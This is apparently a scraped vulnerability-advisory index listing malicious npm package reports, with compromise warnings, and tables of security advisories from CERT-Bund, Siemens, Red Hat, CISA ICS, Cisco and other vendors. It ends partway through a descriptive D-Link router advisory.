mal-2024-1286 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (63cea4fbbb1333188e78d11622c9b943608aea6770144dacf6e1184036a646b7) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1285 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (86831222f9b0a818e862c2db4a2e7f56259e7bae31f417c9464d2c19cb67dadb) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1284 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (c46cf6695c1ee706d7c20760d479bc271d109c548485e896885c9f7b6d704928) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1296 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (8ed8a707955886dfaa2b55283c703e3acbc8f5db17a426587702b53e53a9c0fb) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1290 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (90d2e2f79b4c5000c976cd4c1e99d091bb46b7dbee831bff50b3c69ff36e7dbf) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1281 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (4e6853d07fc7ca8efb0ffc45302b6b677a4b83c2e2de0e773616d9009f9b0ad8) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1288 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6d7bd1b87c4b816789f583c6667d202f613eab5d352c1fcbe90fe1b182a0d13c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1282 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6cdabf6ac5434305cb152ee0eaf4d9cbac6f1de324ae91052537dc8fcfa94410) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1294 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (6da5a4c9da80939fd8b4009200d8e59514e1d3a5664d9b7150b27f40250a584d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1289 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (fa5e340610d92b601dc5de1615c159ce6efea84fa66dccd8d99128054d7cf5c8) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1292 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (271bfa6075e1282de1c0d5269d79377fe6b16e9d60fa41a2a6a070cb97795905) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1279 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (b3dcc117202e21ae1b180b5f80af9dc0a1c0082aee807792f2aeb5b62c8e647d) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1278 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (736ee4fff51c88da50dc79bba67dcb4ee43dd8242b6d75beb08f8ca5f9bc841c) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1277 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (b16145b8b3fe74af3fb0b6c48f0e4f6454bc4b9b0d79f991d6373bc094ad279a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1272 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (48accd040235db7bd6be1bcdc1f268ed9f438c3d3029090ee357139bbe870759) The OpenSSF Package Analysis project identified '@portal-packages/core' @ 15.105.105 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
mal-2024-1274 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (c0d823ab954cd19f85bb933d25f8230386023a6a1fd15430efce0298f6a25aa9) The OpenSSF Package Analysis project identified 'ui-common-components-angular' @ 1.3.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
mal-2024-1273 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (c4d7b54aa00bce85364eddf568913642023e355ba669803fa01e20a143e93a47) The OpenSSF Package Analysis project identified 'metrics-balancer' @ 0.2.0 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
mal-2024-1275 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (543a89535f49dbd2c40707219fba6c80040d752e90ba3347abf1d61e9ea0e477) The OpenSSF Package Analysis project identified '@portal-packages/utils' @ 3.0.99 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
mal-2024-1276 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (65b5439bd3051d2315be6f4ae90f3235c5e41c2d9afa4a3c8f6ff3271c31cb9a) The OpenSSF Package Analysis project identified 'cz-ifood-conventional-changelog' @ 1.0.101 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.
mal-2024-1267 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (82ce80367972231229038d234d1114c39f459b1c4bfe4a03392a3cfa35d4454b) The OpenSSF Package Analysis project identified 'commitlint-config-ifood' @ 1.95.102 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity.
mal-2024-1271 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (dd6b41d316342a401f8e262adb37d1982a359946c37d5b6dbbf9903eed6c6ea0) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1269 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (05c6cf9e3c0564724471422898f07aea9b5234d6c00d38d95441a3fbe18cd004) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1270 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (cf9eff937bcee16db9ca91202bb07969de9b49b32196de1bb49ade4bcbe83d31) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
mal-2024-1268 --- _-= Per source details. Do not edit below this line.=-_ ## Source: ghsa-malware (e32870b3e9ee7f6a8468b3fea4e188d906aa415456731059a4eb93984078ab9a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Vulnerability ID Description
wid-sec-w-2024-1535 tigervnc: Mehrere Schwachstellen ermöglichen Ausführen von beliebigem Programmcode mit Benutzerrechten
wid-sec-w-2024-1534 VMware Cloud Director: Schwachstelle ermöglicht Codeausführung
wid-sec-w-2024-1533 IBM Business Automation Workflow: Schwachstelle ermöglicht Cross-Site Scripting
wid-sec-w-2024-1532 Checkmk: Schwachstelle ermöglicht Offenlegung von Informationen
wid-sec-w-2024-1531 QEMU: Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-1530 OpenJPEG: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2024-1529 Linux Kernel: Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-1528 Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-1527 Exim: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen
wid-sec-w-2024-1526 QT: Schwachstelle ermöglicht Offenlegung von Informationen
wid-sec-w-2024-1486 OpenSSH: Schwachstelle ermöglicht Codeausführung
wid-sec-w-2024-1467 MIT Kerberos: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff
wid-sec-w-2024-1453 Checkmk: Schwachstelle ermöglicht Privilegieneskalation
wid-sec-w-2024-1446 LibreOffice: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen
wid-sec-w-2024-1396 Python: Mehrere Schwachstellen ermöglichen Manipulation von Dateien und Umgehung von Sicherheitsmaßnahmen
wid-sec-w-2024-1310 IBM Java SDK: Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-1264 IBM Java: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen
wid-sec-w-2024-1188 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2024-1012 pgAdmin: Mehrere Schwachstellen
wid-sec-w-2024-1008 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2024-0984 Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0964 Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff
wid-sec-w-2024-0953 Linux Kernel: Schwachstelle ermöglicht Denial of Service
wid-sec-w-2024-0920 Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0906 IBM WebSphere Application Server: Mehrere Schwachstellen
wid-sec-w-2024-0895 Oracle Java SE: Mehrere Schwachstellen
wid-sec-w-2024-0866 PuTTY: Schwachstelle ermöglicht Erlangen des privaten Schlüssels
wid-sec-w-2024-0851 Linux Kernel: Mehrere Schwachstellen
wid-sec-w-2024-0804 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service
wid-sec-w-2024-0773 Linux Kernel: Mehrere Schwachstellen
Vulnerability ID Description
ssa-900277 SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001
ssa-879734 SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1
ssa-871704 SSA-871704: Multiple Vulnerabilities in SICAM Products
ssa-832273 SSA-832273: Multiple Vulnerabilities in Fortigate NGFW before V7.4.3 on RUGGEDCOM APE1808 devices
ssa-771940 SSA-771940: X_T File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go
ssa-753746 SSA-753746: Denial of Service Vulnerabilities in SIMATIC WinCC Affecting Other SIMATIC Software Products
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products
ssa-690517 SSA-690517: Multiple Vulnerabilities in SCALANCE W700 802.11 AX Family
ssa-625862 SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3
ssa-620338 SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM
ssa-599968 SSA-599968: Denial-of-Service Vulnerability in Profinet Devices
ssa-566905 SSA-566905: Multiple Denial of Service Vulnerabilities in the Webserver of Industrial Products
ssa-540640 SSA-540640: Improper Privilege Management Vulnerability in Mendix Runtime
ssa-482757 SSA-482757: Missing Immutable Root of Trust in S7-1500 CPU devices
ssa-481506 SSA-481506: Information Disclosure Vulnerability in SIMATIC S7-200 SMART Devices
ssa-446448 SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack
ssa-407785 SSA-407785: Multiple X_T File Parsing Vulnerabilities in Parasolid and Teamcenter Visualization
ssa-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1
ssa-353002 SSA-353002: Multiple Vulnerabilities in SCALANCE XB-200 / XC-200 / XP-200 / XF-200BA / XR-300WG Family
ssa-341067 SSA-341067: Multiple vulnerabilities in third-party components in ST7 ScadaConnect before V1.1
ssa-337522 SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8
ssa-319319 SSA-319319: Denial of Service Vulnerability in TIA Administrator
ssa-238730 SSA-238730: Out-of-Bounds Write Vulnerabilities in SITOP UPS1600 before V2.5.4
ssa-196737 SSA-196737: Multiple Vulnerabilities in SINEC Traffic Analyzer before V1.2
ssa-093430 SSA-093430: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager before V3.0
ssa-035466 SSA-035466: Incorrect Permission Assignment in SICAM PAS/PQS
ssa-024584 SSA-024584: Authentication Bypass Vulnerability in PowerSys before V3.11
ssa-999588 SSA-999588: Multiple Vulnerabilities in User Management Component (UMC) before V2.11.2
ssa-976324 SSA-976324: Multiple IGS File Parsing Vulnerabilities in PS/IGES Parasolid Translator Component before V27.1.215
ssa-968170 SSA-968170: Remote Code Execution Vulnerability in SIMATIC STEP 7 V5.x and Derived Products
Vulnerability ID Description
rhba-2023_2977 Red Hat Bug Fix Advisory: linux-firmware bug fix and enhancement update
rhsa-2024_4554 Red Hat Security Advisory: kernel-rt security update
rhba-2024_1136 Red Hat Bug Fix Advisory: podman bug fix update
rhba-2024_1127 Red Hat Bug Fix Advisory: libssh bug fix update
rhba-2023_6928 Red Hat Bug Fix Advisory: go-toolset:rhel8 bug fix and enhancement update
rhba-2023_6364 Red Hat Bug Fix Advisory: golang and delve bug fix and enhancement update
rhba-2023_7648 Red Hat Bug Fix Advisory: MTV 2.5.3 Images
rhsa-2024_4549 Red Hat Security Advisory: ghostscript security update
rhsa-2024_4547 Red Hat Security Advisory: kpatch-patch-4_18_0-372_91_1 security update
rhsa-2024_4537 Red Hat Security Advisory: ghostscript security update
rhsa-2024_4546 Red Hat Security Advisory: git-lfs security update
rhsa-2024_4548 Red Hat Security Advisory: kpatch-patch-5_14_0-284_48_1 security update
rhsa-2024_4545 Red Hat Security Advisory: git-lfs security update
rhsa-2024_4543 Red Hat Security Advisory: git-lfs security update
rhsa-2024_4544 Red Hat Security Advisory: ghostscript security update
rhsa-2024_4502 Red Hat Security Advisory: skopeo security update
rhsa-2023_5008 Red Hat Security Advisory: Red Hat build of MicroShift 4.14.0 security update
rhsa-2024_4542 Red Hat Security Advisory: ruby security update
rhsa-2024_4541 Red Hat Security Advisory: ghostscript security update
rhsa-2024_4517 Red Hat Security Advisory: firefox security update
rhsa-2024_4501 Red Hat Security Advisory: firefox security update
rhsa-2024_4508 Red Hat Security Advisory: firefox security update
rhsa-2024_4500 Red Hat Security Advisory: firefox security update
rhba-2018_0337 Red Hat Bug Fix Advisory: Red Hat Satellite 6.3 Base Libraries
rhsa-2024_4533 Red Hat Security Advisory: kernel security update
rhsa-2024_4527 Red Hat Security Advisory: ghostscript security update
rhsa-2024_4528 Red Hat Security Advisory: less security update
rhsa-2024_4529 Red Hat Security Advisory: less security update
rhsa-2024_4326 Red Hat Security Advisory: Red Hat build of Quarkus 3.8.5 release and security update
rhsa-2024_2106 Red Hat Security Advisory: Red Hat build of Quarkus 3.8.4 release
Vulnerability ID Description
icsa-24-165-19 Motorola Solutions Vigilant License Plate Readers
icsa-24-165-18 Rockwell Automation FactoryTalk View SE
icsa-24-165-17 Rockwell Automation FactoryTalk View SE
icsa-24-165-16 Rockwell Automation FactoryTalk View SE
icsa-24-165-14 Fuji Electric Tellus Lite V-Simulator
icsa-24-074-14 Mitsubishi Electric MELSEC-Q/L Series (Update B)
icsa-20-245-01 Mitsubishi Electric Multiple Products (Update G)
icsma-24-163-01 MicroDicom DICOM Viewer
icsa-24-163-04 Intrado 911 Emergency Gateway
icsa-24-163-03 AVEVA PI Asset Framework Client
icsa-24-163-02 AVEVA PI Web API
icsa-24-163-01 Rockwell Automation ControlLogix, GuardLogix, and CompactLogix
icsa-23-108-02 Schneider Electric APC Easy UPS Online Monitoring Software (Update A)
icsa-24-165-13 Siemens SINEC Traffic Analyzer
icsa-24-165-12 Siemens SCALANCE W700
icsa-24-165-11 Siemens SCALANCE XM-400, XR-500
icsa-24-165-10 Siemens SIMATIC and SIPLUS
icsa-24-165-09 Siemens SICAM AK3/BC/TM
icsa-24-165-08 Siemens Teamcenter Visualization and JT2Go
icsa-24-165-07 Siemens PowerSys
icsa-24-165-06 Siemens TIM 1531 IRC
icsa-24-165-05 Siemens SITOP UPS1600
icsa-24-165-04 Siemens ST7 ScadaConnect
icsa-24-165-03 Siemens TIA Administrator
icsa-24-165-02 Siemens SIMATIC S7-200 SMART Devices
icsa-24-165-01 Siemens Mendix Applications
icsa-24-158-04 Johnson Controls Software House iStar Pro Door Controller
icsa-24-158-03 Mitsubishi Electric CC-Link IE TSN Industrial Managed Switch
icsa-24-158-02 Emerson Ovation
icsa-24-158-01 Emerson PACSystem and Fanuc
Vulnerability ID Description
cisco-sa-openssh-rce-2024 Remote Unauthenticated Code Execution Vulnerability in OpenSSH Server (regreSSHion): July 2024
cisco-sa-radius-spoofing-july-2024-87ccdwz3 RADIUS Protocol Spoofing Vulnerability (Blast-RADIUS): July 2024
cisco-sa-xr-secure-boot-qud5g8ap Cisco IOS XR Software Secure Boot Bypass Vulnerability
cisco-sa-nxos-cmd-injection-xd9ohyop Cisco NX-OS Software CLI Command Injection Vulnerability
cisco-sa-cimc-cmd-inj-blupcb Cisco Integrated Management Controller Web-Based Management Interface Command Injection Vulnerability
cisco-sa-cimc-cmd-inj-mux4c5aj Cisco Integrated Management Controller CLI Command Injection Vulnerability
cisco-sa-finesse-ssrf-rfi-um7wt8ew Cisco Finesse Web-Based Management Interface Vulnerabilities
cisco-sa-snort3-ips-bypass-ue69kbmd Multiple Cisco Products Snort 3 HTTP Intrusion Prevention System Rule Bypass Vulnerability
cisco-sa-ftd-archive-bypass-z4wqjwcn Cisco Firepower Threat Defense Software Encrypted Archive File Policy Bypass Vulnerability
cisco-sa-asaftd-ogsnsg-aclbyp-3xb8q6jx Cisco Adaptive Security Appliance and Firepower Threat Defense Software Inactive-to-Active ACL Bypass Vulnerability
cisco-sa-asaftd-dos-njvawoeq Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software DNS Inspection Denial of Service Vulnerability
cisco-sa-asaftd-persist-rce-flsnxf4h Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
cisco-sa-asaftd-cmd-inj-zjv8wysm Cisco Adaptive Security Appliance and Firepower Threat Defense Software Command Injection Vulnerability
cisco-sa-ios-xe-sda-edge-dos-qzwuwxwg Cisco IOS XE Software SD-Access Fabric Edge Node Denial of Service Vulnerability
cisco-sa-iosxr-ipxe-sigbypass-pymfyqgb Cisco IOS XR Software iPXE Boot Signature Bypass Vulnerability
cisco-sa-snmp-uhv6zdef Cisco IOS XR Software SNMP Management Plane Protection ACL Bypass Vulnerability
cisco-sa-duo-infodisc-rlceqm6t Cisco Duo Authentication for Windows Logon and RDP Information Disclosure Vulnerability
cisco-sa-secure-privesc-syxqo6ds Cisco Secure Client for Linux with ISE Posture Module Privilege Escalation Vulnerability
cisco-sa-secure-client-crlf-w43v4g7 Cisco Secure Client Carriage Return Line Feed Injection Vulnerability
cisco-sa-sb-wap-multi-85g83crb Cisco Small Business 100, 300, and 500 Series Wireless Access Points Command Injection and Buffer Overflow Vulnerabilities
cisco-sa-duo-win-bypass-pn42kkbm Cisco Duo Authentication for Windows Logon and RDP Authentication Bypass Vulnerability
cisco-sa-appd-xss-3jwqsmnt Cisco AppDynamics Controller Cross-Site Scripting Vulnerability
cisco-sa-appd-traversal-m7n8mzpf Cisco AppDynamics Controller Path Traversal Vulnerability
cisco-sa-curl-libcurl-d9ds39cv cURL and libcurl Vulnerability Affecting Cisco Products: October 2023
cisco-sa-ucsfi-imm-syn-p6kztdqc Cisco UCS 6400 and 6500 Series Fabric Interconnects Intersight Managed Mode Denial of Service Vulnerability
cisco-sa-nxos-po-acl-tkyepgvl Cisco Nexus 3000 and 9000 Series Switches Port Channel ACL Programming Vulnerability
cisco-sa-nxos-lldp-dos-z7pnctgt Cisco FXOS and NX-OS Software Link Layer Discovery Protocol Denial of Service Vulnerability
cisco-sa-nxos-ebgp-dos-l3qcwvj Cisco NX-OS Software External Border Gateway Protocol Denial of Service Vulnerability
cisco-sa-ipv6-mpls-dos-r9ycxkwm Cisco NX-OS Software MPLS Encapsulated IPv6 Denial of Service Vulnerability
cisco-sa-cimc-xss-umytyetr Cisco Integrated Management Controller Cross-Site Scripting Vulnerability
Vulnerability ID Description
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit
sca-2023-0008 Vulnerability in SICK SIM1012
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products
sca-2023-0007 Vulnerabilities in SICK LMS5xx
sca-2023-0006 Vulnerabilities in SICK ICR890-4
sca-2023-0005 Vulnerabilities in SICK EventCam App
sca-2023-0004 Vulnerabilities in SICK FTMg
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways
Vulnerability ID Description
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2
nn-2023_5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0
nn-2023_1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2
nn-2022_2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0
nn-2022_2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0
nn-2021_2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4
nn-2021_1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4
nn-2020_3-01 Angular template injection on custom report name field
nn-2020_2-01 Cross-site request forgery attack on change password form
nn-2019_2-01 CSV Injection on node label
nn-2019_1-01 Stored XSS in field name data model
Vulnerability ID Description
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001
Vulnerability ID Description
var-202407-0093 Memory corruption when allocating and accessing an entry in an SMEM partition. APQ8064AU firmware, AQT1000 firmware, AR8035 Multiple Qualcomm products such as firmware have a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0088 Improper verification of intent by broadcast receiver vulnerability in Samsung Flow prior to version 4.9.13.0 allows local attackers to copy image files to external storage. Samsung's flow Exists in unspecified vulnerabilities.Information may be obtained
var-202407-0076 Memory corruption when IOMMU unmap operation fails, the DMA and anon buffers are getting released. 315 5g iot modem firmware, AQT1000 firmware, AR8031 Multiple Qualcomm products, such as firmware, contain vulnerabilities related to use of freed memory.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202406-2883 OpenPLC 3 through 9cd8f1b allows XSS via an SVG document as a profile picture. OpenPLC Project of OpenPLC_v3 Firmware has a cross-site scripting vulnerability.Information may be obtained and information may be tampered with
var-202407-0013 Memory corruption while performing finish HMAC operation when context is freed by keymaster. 315 5g iot modem firmware, 9205 lte modem firmware, APQ8017 Multiple Qualcomm products, including firmware, contain a double release vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the UserSettings parameter provided to the Animatics SmartMotor OPC Driver. The issue results from the lack of proper validation of a user-supplied string before using it as a format specifier. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland
var-202406-0183 A vulnerability has been identified in PowerSys (All versions < V3.11). The affected application insufficiently protects responses to authentication requests. This could allow a local attacker to bypass authentication, thereby gaining administrative privileges for the managed remote devices. PowerSys is a service program used for debugging, maintenance and diagnosis of PowerLink 50/100 or SWT 3000 devices
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions. ## Advisory Information Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities. Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-880L -- Wireless AC1900 